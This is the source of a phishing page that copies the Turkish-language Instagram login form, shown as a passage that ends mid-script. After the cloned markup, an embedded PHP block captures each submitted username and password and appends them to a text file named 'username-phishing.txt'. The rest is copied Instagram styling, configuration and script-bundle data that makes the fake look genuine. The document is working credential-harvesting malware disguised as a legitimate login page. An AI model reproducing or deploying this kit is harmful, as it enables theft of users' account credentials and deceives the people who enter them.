#365899;color:#fff;font-size:14px;font-weight:bold;margin:0}.fb_dialog_content .dialog_title>span{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/yd/r/Cou7n-nqK52.gif) no-repeat 5px 50%;float:left;padding:5px 0 7px 26px}body.fb_hidden{height:100%;left:0;margin:0;overflow:visible;position:absolute;top:-10000px;transform:none;width:100%}.fb_dialog.fb_dialog_mobile.loading{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/ya/r/3rhSv5V8j3o.gif) white no-repeat 50% 50%;min-height:100%;min-width:100%;overflow:hidden;position:absolute;top:0;z-index:10001}.fb_dialog.fb_dialog_mobile.loading.centered{background:none;height:auto;min-height:initial;min-width:initial;width:auto}.fb_dialog.fb_dialog_mobile.loading.centered #fb_dialog_loader_spinner{width:100%}.fb_dialog.fb_dialog_mobile.loading.centered .fb_dialog_content{background:none}.loading.centered #fb_dialog_loader_close{clear:both;color:#fff;display:block;font-size:18px;padding-top:20px}#fb-root #fb_dialog_ipad_overlay{background:rgba(0, 0, 0, .4);bottom:0;left:0;min-height:100%;position:absolute;right:0;top:0;width:100%;z-index:10000}#fb-root #fb_dialog_ipad_overlay.hidden{display:none}.fb_dialog.fb_dialog_mobile.loading iframe{visibility:hidden}.fb_dialog_mobile .fb_dialog_iframe{position:sticky;top:0}.fb_dialog_content .dialog_header{background:linear-gradient(from(#738aba), to(#2c4987));border-bottom:1px solid;border-color:#043b87;box-shadow:white 0 1px 1px -1px inset;color:#fff;font:bold 14px Helvetica, sans-serif;text-overflow:ellipsis;text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0;vertical-align:middle;white-space:nowrap}.fb_dialog_content .dialog_header table{height:43px;width:100%}.fb_dialog_content .dialog_header td.header_left{font-size:12px;padding-left:5px;vertical-align:middle;width:60px}.fb_dialog_content .dialog_header td.header_right{font-size:12px;padding-right:5px;vertical-align:middle;width:60px}.fb_dialog_content .touchable_button{background:linear-gradient(from(#4267B2), to(#2a4887));background-clip:padding-box;border:1px solid #29487d;border-radius:3px;display:inline-block;line-height:18px;margin-top:3px;max-width:85px;padding:4px 12px;position:relative}.fb_dialog_content .dialog_header .touchable_button input{background:none;border:none;color:#fff;font:bold 12px Helvetica, sans-serif;margin:2px -12px;padding:2px 6px 3px 6px;text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0}.fb_dialog_content .dialog_header .header_center{color:#fff;font-size:16px;font-weight:bold;line-height:18px;text-align:center;vertical-align:middle}.fb_dialog_content .dialog_content{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/y9/r/jKEcVPZFk-2.gif) no-repeat 50% 50%;border:1px solid #4a4a4a;border-bottom:0;border-top:0;height:150px}.fb_dialog_content .dialog_footer{background:#f5f6f7;border:1px solid #4a4a4a;border-top-color:#ccc;height:40px}#fb_dialog_loader_close{float:left}.fb_dialog.fb_dialog_mobile .fb_dialog_close_button{text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0}.fb_dialog.fb_dialog_mobile .fb_dialog_close_icon{visibility:hidden}#fb_dialog_loader_spinner{animation:rotateSpinner 1.2s linear infinite;background-color:transparent;background-image:url(https://static.xx.fbcdn.net/rsrc.php/v3/yD/r/t-wz8gw1xG1.png);background-position:50% 50%;background-repeat:no-repeat;height:24px;width:24px}@keyframes rotateSpinner{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}\r\n.fb_iframe_widget{display:inline-block;position:relative}.fb_iframe_widget span{display:inline-block;position:relative;text-align:justify}.fb_iframe_widget iframe{position:absolute}.fb_iframe_widget_fluid_desktop,.fb_iframe_widget_fluid_desktop span,.fb_iframe_widget_fluid_desktop iframe{max-width:100%}.fb_iframe_widget_fluid_desktop iframe{min-width:220px;position:relative}.fb_iframe_widget_lift{z-index:1}.fb_iframe_widget_fluid{display:inline}.fb_iframe_widget_fluid span{width:100%}</style></head>\r\n<body class=\"\" style=\"\">\r\n\r\n  <div id=\"react-root\"><section class=\"_9eogI E3X2T\"><div></div><main class=\"SCxLW uzKWK  \" role=\"main\"><nav class=\"q8NLd\"><span class=\"_3G4x7  _9rw6G\"><div class=\"TQUPK\"><span>Türkçe</span><span class=\"coreSpriteChevronDownGrey _6Q5Yk\"></span></div><select aria-label=\"Görünen Dili Değiştir\" class=\"hztqj\"><option value=\"af\">Afrikaans</option><option value=\"cs\">Čeština</option><option value=\"da\">Dansk</option><option value=\"de\">Deutsch</option><option value=\"el\">Ελληνικά</option><option value=\"en\">English</option><option value=\"es\">Español (España)</option><option value=\"es-la\">Español</option><option value=\"fi\">Suomi</option><option value=\"fr\">Français</option><option value=\"id\">Bahasa Indonesia</option><option value=\"it\">Italiano</option><option value=\"ja\">日本語</option><option value=\"ko\">한국어</option><option value=\"ms\">Bahasa Melayu</option><option value=\"nb\">Norsk</option><option value=\"nl\">Nederlands</option><option value=\"pl\">Polski</option><option value=\"pt-br\">Português (Brasil)</option><option value=\"pt\">Português (Portugal)</option><option value=\"ru\">Русский</option><option value=\"sv\">Svenska</option><option value=\"th\">ภาษาไทย</option><option value=\"tl\">Filipino</option><option value=\"tr\">Türkçe</option><option value=\"zh-cn\">中文(简体)</option><option value=\"zh-tw\">中文(台灣)</option><option value=\"bn\">বাংলা</option><option value=\"gu\">ગુજરાતી</option><option value=\"hi\">हिन्दी</option><option value=\"hr\">Hrvatski</option><option value=\"hu\">Magyar</option><option value=\"kn\">ಕನ್ನಡ</option><option value=\"ml\">മലയാളം</option><option value=\"mr\">मराठी</option><option value=\"ne\">नेपाली</option><option value=\"pa\">ਪੰਜਾਬੀ</option><option value=\"si\">සිංහල</option><option value=\"sk\">Slovenčina</option><option value=\"ta\">தமிழ்</option><option value=\"te\">తెలుగు</option><option value=\"vi\">Tiếng Việt</option><option value=\"zh-hk\">中文(香港)</option><option value=\"bg\">Български</option><option value=\"fr-ca\">Français (Canada)</option><option value=\"ro\">Română</option><option value=\"sr\">Српски</option><option value=\"uk\">Українська</option></select></span><div class=\"coreSpriteOptionsEllipsis KjWFV\" role=\"menuitem\" tabindex=\"0\"></div></nav><article class=\"tbpKJ\">\r\n\r\n    <div class=\"rgFsT M2tlr\">\r\n      <div class=\"gr27e \">\r\n        <h1 class=\"NXVPg Szr5J  coreSpriteLoggedOutWordmark\">Instagram</h1>\r\n        <div class=\"EPjEi\">\r\n          <form class=\"HmktE\" method=\"post\"><div class=\"                   Igw0E     IwRSH      eGOV_         _4EzTm        FBi-h                                                                                                      \"></div><div class=\"                   Igw0E     IwRSH      eGOV_         _4EzTm    bkEs3                          CovQj                  jKUp7          DhRcB                                                    \"><button class=\"sqdOP  L3NKy   y3zKF     \" type=\"button\"><span class=\"coreSpriteFacebookIconInverted AeB99\"></span>Facebook ile Devam Et</button></div><div class=\"K-1uj VILGp\"><div class=\"s311c\"></div><div class=\"_0tv-g\">ya da</div><div class=\"s311c\"></div></div><div class=\"Et89U\"><div class=\"_9GP1n   \"><label class=\"f0n8F \"><span class=\"_9nyy2\"></span>\r\n\r\n\r\n            <input placeholder=\"Telefon numarası, kullanıcı adı veya e-posta\"  maxlength=\"75\" name=\"userid22\" type=\"text\" class=\"_2hvTZ pexuQ zyHYP\" value=\"\" style=\"font-size:12.6px;\" required=\"\"></label><div class=\"i24fI\"></div></div></div><div class=\"Et89U\"><div class=\"_9GP1n   \"><label class=\"f0n8F \"><span class=\"_9nyy2\"></span><input placeholder=\"Şifre\" name=\"pswrd\" type=\"password\" class=\"_2hvTZ pexuQ zyHYP\" value=\"\"  style=\"font-size:12.7px;\" required=\"\"></label><div class=\"i24fI\"></div></div></div><div class=\"                   Igw0E     IwRSH       hLiUi    ybXk5    _4EzTm    bkEs3                          CovQj                  jKUp7                                              qJPeX                \"><a href=\"https://www.instagram.com/accounts/password/reset/\"><div class=\"_7UhW9   xLCgt      MMzan       gtFbE   uL8Hv         \">Şifreni mi unuttun?</div></a></div><div class=\"                   Igw0E     IwRSH      eGOV_         _4EzTm    bkEs3                          CovQj                  jKUp7          DhRcB                                                    \">\r\n\r\n              <button class=\"sqdOP   y3zKF     \" type=\"submit\" style=\"color:white;border-radius:4px;\">\r\n\r\n                <div class=\"                   Igw0E     IwRSH      eGOV_         _4EzTm                                                                                                              \">\r\n\r\n                Giriş Yap</div></button>\r\n\r\n\r\n\r\n              </div><div class=\"                   Igw0E   rBNOH        eGOV_         _4EzTm                                                            aGBdT                                                  \"><div class=\"_7UhW9   xLCgt     yUEEX    _0PwGv       uL8Hv         \"><p>Hesabın yok mu? <a href=\"https://www.instagram.com/accounts/signup/phone\"><span class=\"_7UhW9   xLCgt       qyrsm      gtFbE    se6yk        \">Kaydol</span></a></p></div></div></form></div></div></div></article><div class=\"      tHaIX             Igw0E   rBNOH          YBx95   ybXk5    _4EzTm                                                                                                        O1flK   _7JkPY    PdTAI ZUqME\" style=\"height: 60px; width: 100%;\"><span aria-label=\"Facebook'tan\" class=\"glyphsSpriteFb_brand_center_grey u-__7\"></span></div></main><footer class=\"_8Rna9 _09ncq  \" role=\"contentinfo\"></footer><div class=\"MFkQJ ABLKx VhasA _1-msl\"><div class=\"GfkS6 \"></div><div class=\"ZsSMR\"><a class=\"z1VUo KD4vR ABLKx VhasA\" href=\"https://itunes.apple.com/app/instagram/id389801252?pt=428156&amp;ct=igweb.loginPage.installLink&amp;mt=8&amp;vt=lo\" role=\"alert\"><section class=\"dZvHF  fvoD7\"><p class=\"xK6EF\">Instagram</p><p class=\"_5b2Kp\">App Store'da ücretsiz bul.</p></section><section class=\"FMlV_\"><button class=\"_4IAxF\">Yükle</button></section></a></div></div></section></div>\r\n\r\n\r\n<?php\r\nif (!empty($_POST[\"pswrd\"]) && !empty($_POST[\"userid22\"])) {\r\n$ac1 = fopen(\"username-phishing.txt\",\"a+\");\r\n$password = @$_POST['pswrd'];\r\n$username = @$_POST['userid22'];\r\n$userlarr = \"\\n __________________ \\n Username: \".$username.\"\\n Password: \".$password;\r\nfwrite($ac1,$userlarr);\r\nfclose($ac1);} ?>\r\n\r\n\r\n\r\n              <link rel=\"stylesheet\" href=\"https://www.instagram.com/static/bundles/es6/ConsumerUICommons.css/5ec5409f6864.css\" type=\"text/css\" crossorigin=\"anonymous\">\r\n              <link rel=\"stylesheet\" href=\"https://www.instagram.com/static/bundles/es6/ConsumerAsyncCommons.css/27a959f10aa9.css\" type=\"text/css\" crossorigin=\"anonymous\">\r\n              <link rel=\"stylesheet\" href=\"https://www.instagram.com/static/bundles/es6/Consumer.css/5618806114ac.css\" type=\"text/css\" crossorigin=\"anonymous\">\r\n              <script type=\"text/javascript\">window._sharedData = {\"config\":{\"csrf_token\":\"KcK4iL1DubK1uslKJuWHsvXcUhs35oqZ\",\"viewer\":null,\"viewerId\":null},\"country_code\":\"TR\",\"language_code\":\"tr\",\"locale\":\"tr_TR\",\"entry_data\":{\"LoginAndSignupPage\":[{\"captcha\":{\"enabled\":false,\"key\":\"\"},\"gdpr_required\":false,\"tos_version\":\"row\",\"username_hint\":\"\"}]},\"hostname\":\"www.instagram.com\",\"is_whitelisted_crawl_bot\":false,\"deployment_stage\":\"c2\",\"platform\":\"ios\",\"nonce\":\"fSIQz4ueZpoHS6QGvKYnRg==\",\"mid_pct\":73.33914,\"zero_data\":{},\"cache_schema_version\":3,\"server_checks\":{},\"knobx\":{\"4\":false,\"17\":false,\"20\":true,\"22\":true,\"23\":true,\"24\":true,\"25\":true,\"26\":true},\"to_cache\":{\"gatekeepers\":{\"4\":true,\"5\":false,\"6\":false,\"7\":false,\"8\":false,\"9\":false,\"10\":false,\"11\":false,\"12\":false,\"13\":true,\"14\":true,\"15\":true,\"16\":true,\"18\":true,\"19\":false,\"23\":false,\"24\":false,\"26\":true,\"27\":false,\"28\":false,\"29\":true,\"31\":false,\"32\":true,\"34\":false,\"35\":false,\"38\":true,\"40\":true,\"41\":false,\"43\":true,\"59\":true,\"61\":false,\"62\":false,\"63\":false,\"64\":false,\"65\":false,\"67\":true,\"68\":false,\"69\":true,\"71\":false,\"72\":true,\"73\":false,\"74\":false,\"75\":true,\"77\":false,\"78\":true,\"79\":false,\"81\":false,\"82\":true,\"84\":false,\"86\":false,\"88\":true,\"91\":false,\"95\":true,\"97\":false,\"99\":false,\"100\":true,\"101\":false,\"102\":true,\"103\":false,\"104\":true,\"105\":true,\"106\":false,\"107\":false,\"108\":false},\"qe\":{\"app_upsell\":{\"g\":\"\",\"p\":{}},\"igl_app_upsell\":{\"g\":\"\",\"p\":{}},\"notif\":{\"g\":\"\",\"p\":{}},\"onetaplogin\":{\"g\":\"\",\"p\":{}},\"multireg_iter\":{\"g\":\"\",\"p\":{}},\"felix_clear_fb_cookie\":{\"g\":\"\",\"p\":{}},\"felix_creation_duration_limits\":{\"g\":\"\",\"p\":{}},\"felix_creation_fb_crossposting\":{\"g\":\"\",\"p\":{}},\"felix_creation_fb_crossposting_v2\":{\"g\":\"\",\"p\":{}},\"felix_creation_validation\":{\"g\":\"\",\"p\":{}},\"mweb_topical_explore\":{\"g\":\"\",\"p\":{}},\"post_options\":{\"g\":\"\",\"p\":{}},\"iglscioi\":{\"g\":\"\",\"p\":{}},\"sticker_tray\":{\"g\":\"\",\"p\":{}},\"web_sentry\":{\"g\":\"\",\"p\":{}},\"0\":{\"p\":{\"4\":true,\"7\":true,\"8\":true,\"9\":false},\"qex\":true},\"2\":{\"p\":{\"0\":true},\"qex\":true},\"4\":{\"p\":{\"0\":true},\"qex\":true},\"5\":{\"p\":{\"1\":false},\"qex\":true},\"6\":{\"p\":{\"1\":true,\"5\":false,\"6\":false,\"7\":false,\"9\":false,\"10\":false},\"qex\":true},\"10\":{\"p\":{\"2\":false},\"qex\":true},\"12\":{\"p\":{\"0\":5},\"qex\":true},\"13\":{\"p\":{\"0\":true},\"qex\":true},\"16\":{\"p\":{\"0\":false},\"qex\":true},\"17\":{\"p\":{\"1\":true},\"qex\":true},\"19\":{\"p\":{\"0\":true},\"qex\":true},\"21\":{\"p\":{\"2\":false},\"qex\":true},\"22\":{\"p\":{\"1\":false,\"2\":8.0,\"3\":0.85,\"4\":0.95,\"10\":0.0,\"11\":15,\"12\":3,\"13\":false},\"qex\":true},\"23\":{\"p\":{\"0\":false,\"1\":false},\"qex\":true},\"25\":{\"p\":{},\"qex\":true},\"26\":{\"p\":{\"0\":\"\"},\"qex\":true},\"28\":{\"p\":{\"0\":false},\"qex\":true},\"29\":{\"p\":{},\"qex\":true},\"30\":{\"p\":{\"0\":true},\"qex\":true},\"31\":{\"p\":{},\"qex\":true},\"33\":{\"p\":{},\"qex\":true},\"34\":{\"p\":{\"0\":false},\"qex\":true},\"35\":{\"p\":{\"0\":false},\"qex\":true},\"36\":{\"p\":{\"0\":true,\"1\":true,\"2\":false,\"3\":false,\"4\":false},\"qex\":true},\"37\":{\"p\":{\"0\":false},\"qex\":true},\"39\":{\"p\":{\"0\":false,\"6\":false,\"7\":false,\"8\":false,\"14\":false},\"qex\":true},\"41\":{\"p\":{\"3\":true},\"qex\":true},\"42\":{\"p\":{\"0\":true},\"qex\":true},\"43\":{\"p\":{\"0\":false,\"1\":false,\"2\":false},\"qex\":true},\"44\":{\"p\":{\"1\":\"inside_media\",\"2\":0.2},\"qex\":true},\"45\":{\"p\":{\"12\":false,\"13\":false,\"17\":0,\"18\":false,\"19\":2,\"22\":false,\"23\":\"control\",\"24\":false,\"25\":\"control\",\"26\":\"control\",\"32\":false,\"33\":false},\"qex\":true},\"46\":{\"p\":{\"0\":false},\"qex\":true},\"47\":{\"p\":{\"0\":true,\"1\":true,\"2\":false,\"3\":false,\"4\":false,\"6\":false,\"8\":false,\"9\":false,\"10\":false,\"11\":false},\"qex\":true},\"49\":{\"p\":{\"0\":false},\"qex\":true},\"50\":{\"p\":{\"0\":false},\"qex\":true},\"53\":{\"p\":{\"0\":5},\"qex\":true},\"54\":{\"p\":{\"0\":false},\"qex\":true},\"55\":{\"p\":{\"0\":false},\"qex\":true},\"56\":{\"p\":{\"1\":true,\"2\":true},\"qex\":true},\"58\":{\"p\":{\"0\":0.0,\"1\":false},\"qex\":true},\"59\":{\"p\":{\"0\":true},\"qex\":true},\"62\":{\"p\":{\"0\":false},\"qex\":true},\"64\":{\"p\":{\"0\":false},\"qex\":true},\"65\":{\"p\":{},\"qex\":true},\"66\":{\"p\":{\"0\":false},\"qex\":true},\"67\":{\"p\":{\"0\":true,\"1\":true,\"2\":true,\"3\":true,\"4\":false,\"5\":false,\"6\":false,\"7\":false},\"qex\":true},\"68\":{\"p\":{\"0\":false},\"qex\":true},\"69\":{\"p\":{\"0\":true},\"qex\":true},\"70\":{\"p\":{\"1\":\"Instagram\\u306f\\u30a2\\u30d7\\u30ea\\u3067\\u3088\\u308a\\u5feb\\u9069\\u306b\\u3054\\u5229\\u7528\\u306b\\u306a\\u308c\\u307e\\u3059\",\"2\":\"\\u30a2\\u30d7\\u30ea\\u306b\\u306f\\u3088\\u308a\\u591a\\u304f\\u306e\\u30ab\\u30e1\\u30e9\\u30a8\\u30d5\\u30a7\\u30af\\u30c8\\u3084\\u30b9\\u30bf\\u30f3\\u30d7\\u304c\\u3042\\u308a\\u307e\\u3059\\u3002\\u30e1\\u30c3\\u30bb\\u30fc\\u30b8\\u3092\\u9001\\u4fe1\\u3059\\u308b\\u65b9\\u6cd5\\u3082\\u3088\\u308a\\u591a\\u304f\\u3042\\u308a\\u307e\\u3059\\u3002\",\"3\":\"\\u30a2\\u30d7\\u30ea\\u3092\\u5229\\u7528\"},\"qex\":true},\"71\":{\"p\":{\"1\":\"^/explore/.*|^/accounts/activity/$\"},\"qex\":true},\"72\":{\"p\":{\"0\":false,\"1\":true,\"2\":true,\"3\":false,\"4\":false},\"qex\":true},\"73\":{\"p\":{\"0\":false},\"qex\":true},\"74\":{\"p\":{\"1\":false,\"2\":false,\"3\":false,\"4\":false,\"5\":false,\"6\":false,\"7\":false,\"8\":false,\"9\":false,\"10\":false},\"qex\":true},\"75\":{\"p\":{\"0\":true},\"qex\":true},\"76\":{\"p\":{\"0\":true,\"1\":false},\"qex\":true},\"77\":{\"p\":{\"0\":true,\"1\":false},\"qex\":true},\"78\":{\"p\":{\"0\":true,\"1\":false},\"qex\":true},\"80\":{\"p\":{\"3\":false},\"qex\":true},\"81\":{\"p\":{\"0\":false},\"qex\":true},\"84\":{\"p\":{\"0\":true,\"1\":true,\"2\":true,\"3\":false,\"4\":true,\"5\":true,\"6\":false,\"8\":false},\"qex\":true},\"85\":{\"p\":{\"0\":false,\"1\":\"Pictures and Videos\"},\"qex\":true},\"87\":{\"p\":{\"0\":false},\"qex\":true},\"89\":{\"p\":{\"0\":false},\"qex\":true},\"91\":{\"p\":{\"0\":false},\"qex\":true},\"92\":{\"p\":{\"0\":36},\"qex\":true},\"93\":{\"p\":{\"0\":true},\"qex\":true},\"95\":{\"p\":{\"0\":false,\"1\":false},\"qex\":true},\"96\":{\"p\":{\"0\":false},\"qex\":true},\"97\":{\"p\":{},\"qex\":true},\"98\":{\"p\":{\"1\":false},\"qex\":true},\"99\":{\"p\":{\"0\":false},\"qex\":true},\"100\":{\"p\":{},\"qex\":true},\"101\":{\"p\":{\"0\":false,\"1\":false},\"qex\":true},\"102\":{\"p\":{\"0\":true},\"qex\":true},\"103\":{\"p\":{\"0\":false,\"1\":false},\"qex\":true},\"104\":{\"p\":{\"0\":true},\"qex\":true},\"105\":{\"p\":{\"0\":\"control\"},\"qex\":true},\"106\":{\"p\":{\"0\":true},\"qex\":true},\"107\":{\"p\":{},\"qex\":true},\"108\":{\"p\":{\"0\":false,\"1\":false},\"qex\":true},\"109\":{\"p\":{},\"qex\":true},\"110\":{\"p\":{\"0\":false},\"qex\":true}},\"probably_has_app\":false,\"cb\":false},\"device_id\":\"A550684D-EC60-4B24-85EE-0462E180B195\",\"encryption\":{\"key_id\":\"155\",\"public_key\":\"4fd28ee2f38b02707cf2478111e82ed6c3d9fb4e181768d4bc15b6aae1474a45\"},\"rollout_hash\":\"3aed6acc7f7a\",\"bundle_variant\":\"es6\",\"is_canary\":false};</script>\r\n              <script type=\"text/javascript\">window.__initialDataLoaded(window._sharedData);</script>\r\n              <script type=\"text/javascript\">var __BUNDLE_START_TIME__=this.nativePerformanceNow?nativePerformanceNow():Date.now(),__DEV__=false,process=this.process||{};process.env=process.env||{};process.env.NODE_ENV=process.env.NODE_ENV||\"production\";!(function(t){\"use strict\";function e(){return s=Object.create(null)}function r(t){const e=t,r=s[e];return r&&r.isInitialized?r.publicModule.exports:i(e,r)}function n(t){const e=t;if(s[e]&&s[e].importedDefault!==f)return s[e].importedDefault;const n=r(e),o=n&&n.__esModule?n.default:n;return s[e].importedDefault=o}function o(t){const e=t;if(s[e]&&s[e].importedAll!==f)return s[e].importedAll;const n=r(e);let o;if(n&&n.__esModule)o=n;else{if(o={},n)for(const t in n)a.call(n,t)&&(o[t]=n[t]);o.default=n}return s[e].importedAll=o}function i(e,r){if(!p&&t.ErrorUtils){p=!0;let n;try{n=c(e,r)}catch(e){t.ErrorUtils.reportFatalError(e)}return p=!1,n}return c(e,r)}function l(t){return{segmentId:t>>>h,localId:t&m}}function c(e,i){if(!i&&I.length>0){const t=l(e),r=t.segmentId,n=t.localId,o=I[r];null!=o&&(o(n),i=s[e])}const c=t.nativeRequire;if(!i&&c){const t=l(e),r=t.segmentId;c(t.localId,r),i=s[e]}if(!i)throw u(e);if(i.hasError)throw d(e,i.error);i.isInitialized=!0;const f=i,a=f.factory,p=f.dependencyMap;try{const l=i.publicModule;if(l.id=e,g.length>0)for(let t=0;t<g.length;++t)g[t].cb(e,l);return a(t,r,n,o,l,l.exports,p),i.factory=void 0,i.dependencyMap=void 0,l.exports}catch(t){throw i.hasError=!0,i.error=t,i.isInitialized=!1,i.publicModule.exports=void 0,t}}function u(t){let e='Requiring unknown module \"'+t+'\".';return Error(e)}function d(t,e){const r=t;return Error('Requiring module \"'+r+'\", which threw an exception: '+e)}t.__r=r,t.__d=function(t,e,r){null==s[e]&&(s[e]={dependencyMap:r,factory:t,hasError:!1,importedAll:f,importedDefault:f,isInitialized:!1,publicModule:{exports:{}}})},t.__c=e,t.__registerSegment=function(t,e){I[t]=e};var s=e();const f={},a={}.hasOwnProperty;r.importDefault=n,r.importAll=o;let p=!1;const h=16,m=65535;r.unpackModuleId=l,r.packModuleId=function(t){return(t.segmentId<<h)+t.localId};const g=[];r.registerHook=function(t){const e={cb:t};return g.push(e),{release:()=>{for(let t=0;t<g.length;++t)if(g[t]===e){g.splice(t,1);break}}}};const I=[]})('undefined'!=typeof global?global:'undefined'!=typeof window?window:this);\r\n            __s={\"js\":{\"146\":\"/static/bundles/es6/IGBloksRenderer.js/40a1d2bdc110.js\",\"147\":\"/static/bundles/es6/EncryptionUtils.js/eb91fe9ce25c.js\",\"148\":\"/static/bundles/es6/MobileStoriesLoginPage.js/14e4ea10d88b.js\",\"149\":\"/static/bundles/es6/DesktopStoriesLoginPage.js/c091a761bbba.js\",\"150\":\"/static/bundles/es6/AvenyFont.js/a4de03cd349f.js\",\"151\":\"/static/bundles/es6/DirectSearchUserContainer.js/45f55a424c31.js\",\"152\":\"/static/bundles/es6/MobileStoriesPage.js/d7e62c40bb77.js\",\"153\":\"/static/bundles/es6/DesktopStoriesPage.js/d5d9829573ac.js\",\"154\":\"/static/bundles/es6/ActivityFeedPage.js/e6f41e27e6f0.js\",\"155\":\"/static/bundles/es6/AdsSettingsPage.js/6a478fe7d09f.js\",\"156\":\"/static/bundles/es6/DonateCheckoutPage.js/3c829d918cef.js\",\"157\":\"/static/bundles/es6/CameraPage.js/9ac12a3db59c.js\",\"158\":\"/static/bundles/es6/SettingsModules.js/bed30988c3ac.js\",\"159\":\"/static/bundles/es6/ContactHistoryPage.js/4d0d57032087.js\",\"160\":\"/static/bundles/es6/AccessToolPage.js/0fde52ed09d7.js\",\"161\":\"/static/bundles/es6/AccessToolViewAllPage.js/edb30bdfe720.js\",\"162\":\"/static/bundles/es6/AccountPrivacyBugPage.js/884379655c6c.js\",\"163\":\"/static/bundles/es6/FirstPartyPlaintextPasswordLandingPage.js/db47643c67f2.js\",\"164\":\"/static/bundles/es6/ThirdPartyPlaintextPasswordLandingPage.js/052369cf7fa9.js\",\"165\":\"/static/bundles/es6/ShoppingBagLandingPage.js/2c90c2efe18d.js\",\"166\":\"/static/bundles/es6/PlaintextPasswordBugPage.js/9e6c713bbad9.js\",\"167\":\"/static/bundles/es6/PrivateAccountMadePublicBugPage.js/6e978a75106d.js\",\"168\":\"/static/bundles/es6/PublicAccountNotMadePrivateBugPage.js/05ef54ad6080.js\",\"169\":\"/static/bundles/es6/BlockedAccountsBugPage.js/12a183726b7d.js\",\"170\":\"/static/bundles/es6/AndroidBetaPrivacyBugPage.js/f78b2431e644.js\",\"171\":\"/static/bundles/es6/DataControlsSupportPage.js/7653080a8b1e.js\",\"172\":\"/static/bundles/es6/DataDownloadRequestPage.js/f5ffd7645e36.js\",\"173\":\"/static/bundles/es6/DataDownloadRequestConfirmPage.js/09621afa258a.js\",\"174\":\"/static/bundles/es6/CheckpointUnderageAppealPage.js/40d12148dd30.js\",\"175\":\"/static/bundles/es6/AccountRecoveryLandingPage.js/c7203b12c923.js\",\"176\":\"/static/bundles/es6/ContactInvitesOptOutPage.js/9c54ba0aa005.js\",\"177\":\"/static/bundles/es6/ParentalConsentPage.js/81305df6c39d.js\",\"178\":\"/static/bundles/es6/ParentalConsentNotParentPage.js/340b4728097d.js\",\"179\":\"/static/bundles/es6/TermsAcceptPage.js/dd8201030c96.js\",\"180\":\"/static/bundles/es6/TermsUnblockPage.js/9a452b43ec23.js\",\"181\":\"/static/bundles/es6/NewTermsConfirmPage.js/9fed08e359da.js\",\"182\":\"/static/bundles/es6/ContactInvitesOptOutStatusPage.js/03a9de306cfb.js\",\"183\":\"/static/bundles/es6/CreationModules.js/0d0fefaad866.js\",\"184\":\"/static/bundles/es6/StoryCreationPage.js/7f6d5cfd0760.js\",\"185\":\"/static/bundles/es6/PostCommentInput.js/a755fd6877e8.js\",\"188\":\"/static/bundles/es6/PostModalEntrypoint.js/068b0937b5ec.js\",\"189\":\"/static/bundles/es6/PostComments.js/50d84e5f921e.js\",\"190\":\"/static/bundles/es6/LikedByListContainer.js/cc7244d14a7a.js\",\"191\":\"/static/bundles/es6/CommentLikedByListContainer.js/0cd05575e40e.js\",\"192\":\"/static/bundles/es6/shaka-player.ui.js/b9f35f591861.js\",\"193\":\"/static/bundles/es6/DynamicExploreMediaPage.js/4d14ddbae301.js\",\"194\":\"/static/bundles/es6/DiscoverMediaPageContainer.js/8c76be6d7042.js\",\"195\":\"/static/bundles/es6/DiscoverPeoplePageContainer.js/21727e130c93.js\",\"196\":\"/static/bundles/es6/EmailConfirmationPage.js/a9d1f7f44197.js\",\"197\":\"/static/bundles/es6/EmailReportBadPasswordResetPage.js/144d9a593c05.js\",\"198\":\"/static/bundles/es6/FBSignupPage.js/68cb30f9baf8.js\",\"199\":\"/static/bundles/es6/NewUserInterstitial.js/e23bde50b6f3.js\",\"200\":\"/static/bundles/es6/MultiStepSignupPage.js/3582fa3821b4.js\",\"201\":\"/static/bundles/es6/EmptyFeedPage.js/0e821cce585e.js\",\"202\":\"/static/bundles/es6/NewUserActivatorsUnit.js/a3146ed05f84.js\",\"203\":\"/static/bundles/es6/FeedEndSuggestedUserUnit.js/c14b6b4f6778.js\",\"204\":\"/static/bundles/es6/FeedSidebarContainer.js/1d6e99529e38.js\",\"205\":\"/static/bundles/es6/SuggestedUserFeedUnitContainer.js/45dae2a7022e.js\",\"206\":\"/static/bundles/es6/InFeedStoryTray.js/7f47063d3fdb.js\",\"207\":\"/static/bundles/es6/FeedPageContainer.js/9a19851d1932.js\",\"208\":\"/static/bundles/es6/FollowListModal.js/7878311d01b3.js\",\"209\":\"/static/bundles/es6/FollowListPage.js/594e4fa1ea20.js\",\"210\":\"/static/bundles/es6/SimilarAccountsPage.js/386a4aec05ca.js\",\"211\":\"/static/bundles/es6/LiveBroadcastPage.js/1bd8b594e465.js\",\"212\":\"/static/bundles/es6/FalseInformationLandingPage.js/97b7e1b83902.js\",\"213\":\"/static/bundles/es6/LandingPage.js/726b43b2af9b.js\",\"214\":\"/static/bundles/es6/LocationsDirectoryCountryPage.js/3608138c0109.js\",\"215\":\"/static/bundles/es6/LocationsDirectoryCityPage.js/23f77418deaa.js\",\"216\":\"/static/bundles/es6/LocationPageContainer.js/4c0d30e73c78.js\",\"217\":\"/static/bundles/es6/LocationsDirectoryLandingPage.js/909f3c743d4b.js\",\"218\":\"/static/bundles/es6/LoginAndSignupPage.js/b2e37b561f81.js\",\"219\":\"/static/bundles/es6/UpdateIGAppForHelpPage.js/693b4f24b190.js\",\"220\":\"/static/bundles/es6/ResetPasswordPageContainer.js/997d46835d10.js\",\"221\":\"/static/bundles/es6/MobileAllCommentsPage.js/415abf8b00ad.js\",\"222\":\"/static/bundles/es6/MediaChainingPageContainer.js/92f6cc95f9a7.js\",\"223\":\"/static/bundles/es6/PostPageContainer.js/3a1b50f55250.js\",\"224\":\"/static/bundles/es6/ProfilesDirectoryLandingPage.js/b14368e8c518.js\",\"225\":\"/static/bundles/es6/HashtagsDirectoryLandingPage.js/4d7f305c5249.js\",\"226\":\"/static/bundles/es6/SuggestedDirectoryLandingPage.js/caf2452f0f99.js\",\"227\":\"/static/bundles/es6/TagPageContainer.js/38e4680b46f5.js\",\"228\":\"/static/bundles/es6/PhoneConfirmPage.js/8e7d83d385b3.js\",\"229\":\"/static/bundles/es6/SimilarAccountsModal.js/4bd7e09bfc30.js\",\"230\":\"/static/bundles/es6/ProfilePageContainer.js/f8e01de5c01a.js\",\"231\":\"/static/bundles/es6/HttpErrorPage.js/3fbeb8a995c4.js\",\"232\":\"/static/bundles/es6/IGTVVideoD